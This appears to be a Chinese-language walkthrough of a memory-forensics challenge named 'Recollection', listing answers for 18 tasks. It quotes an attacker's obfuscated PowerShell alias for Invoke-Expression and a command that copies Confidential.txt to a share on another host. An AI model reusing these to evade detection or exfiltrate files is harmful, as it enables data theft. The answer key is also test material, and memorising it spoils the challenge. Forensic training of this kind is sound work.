Recollection
task1-2
1 |
|
task1操作系统是什么? windows 7
task2内存转储是什么时候创建的?2022-12-19 16:07:30
task3
题目:攻击者获得计算机的访问权限后,将混淆的 PowerShell 命令复制到剪贴板。命令是什么?
1 |
|
答案:(gv ‘MDR‘).naMe[3,11,2]-joIN’’
Task 4-8
Task 4 题目:攻击者复制了混淆后的命令,将其用作 PowerShell cmdlet 的别名。cmdlet 名称是什么?
Task 5 题目:执行了 CMD 命令来尝试窃取文件。完整的命令行是什么?
Task 6 题目:按照上面的命令,现在告诉我们文件是否已成功泄露?
Task 7 题目:攻击者试图创建自述文件。文件的完整路径是什么?
Task 8 题目:机器的主机名是什么?
1 |
|
通过文件里面得到内容可以得到向192.168.0.171这个主机发送了Confidential.txt文件,执行了一个用base64编码的命令,执行了混淆代码,在download文件夹内执行了一个程序,执行net users
查看Confidential.txt并发送到其他主机
但path错误
用 powershell 执行了一串 base64 编码后的命令
可以用以下代码查看解码后的内容
1 |
|
执行混淆代码
先把大小写混淆的代码还原(gv '*MDR*').name[3,11,2]-join''
在本地执行过代码发现iex,相当于eval函数
执行net users
答案4-8
- Invoke-Expression
- type C:\Users\Public\Secret\Confidential.txt > \192.168.0.171\pulice\pass.txt
- No
- C:\Users\Public\Office\readme.txt
- USER-PC
Task 9
有多少个用户
1 |
|
可以发现有四个用户,但有一个是隐藏所以只有三个用户
答案:3
Task 10
题目:在“\Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge”文件夹中有一些子文件夹,其中有一个名为passwords.txt的文件。完整的文件位置/路径是什么?
1 |
|
答案:\Device\HarddiskVolume2\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\3.0.0.0\passwords.txt
Task 11
题目:使用命令执行了恶意可执行文件。可执行 EXE 文件的名称是其本身的哈希值。哈希值是多少?
1 |
|
答案:b0ad704122d9cffddd57ec92991a1e99fc1ac02d5b4d8fd31720978c02635cb1
Task 12
题目:继上一个问题之后,您在上面找到的恶意文件的 Imphash 是什么?
1 |
|
把文件的hash值https://www.virustotal.com/gui/home/search网站上面进行搜索
答案:d3b592cd9481e4f053b5362e22d61595
Task 13
题目:在上一个问题之后,请以UTC格式告诉我们创建恶意文件的日期?
同上在下面可以发现一个创建时间
答案:2022-06-22 11:49:04
Task 14
题目:机器的本地 IP 地址是什么?
1 |
|
仔细查看Local Address列
答案:192.168.0.104
Task 15
题目:有多个 PowerShell 进程,其中一个进程是子进程。哪个进程是它的父进程?
1 |
|
答案:cmd.exe
Task 16
题目:攻击者可能使用电子邮件地址登录社交媒体。你能告诉我们电子邮件地址吗?
1 |
|
发现有很多的邮箱,结合Tesk 7的hacked by mafia,可以发现正确的邮箱是mafia_code1337@gmail.com
Task 17
题目:使用 MS Edge 浏览器,受害者搜索了 SIEM 解决方案。SIEM 解决方案的名称是什么?
1 |
|
查看keyword_search_thems表中的数据
答案:
wazuh
Task 18
题目:受害用户下载了 exe 文件。该文件的名称模仿了带有拼写错误的Microsoft的合法二进制文件(即合法的二进制文件powershell.exe,攻击者将恶意软件命名为powershall.exe)。告诉我们文件扩展名的文件名?
1 |
|
答案:csrsss.exe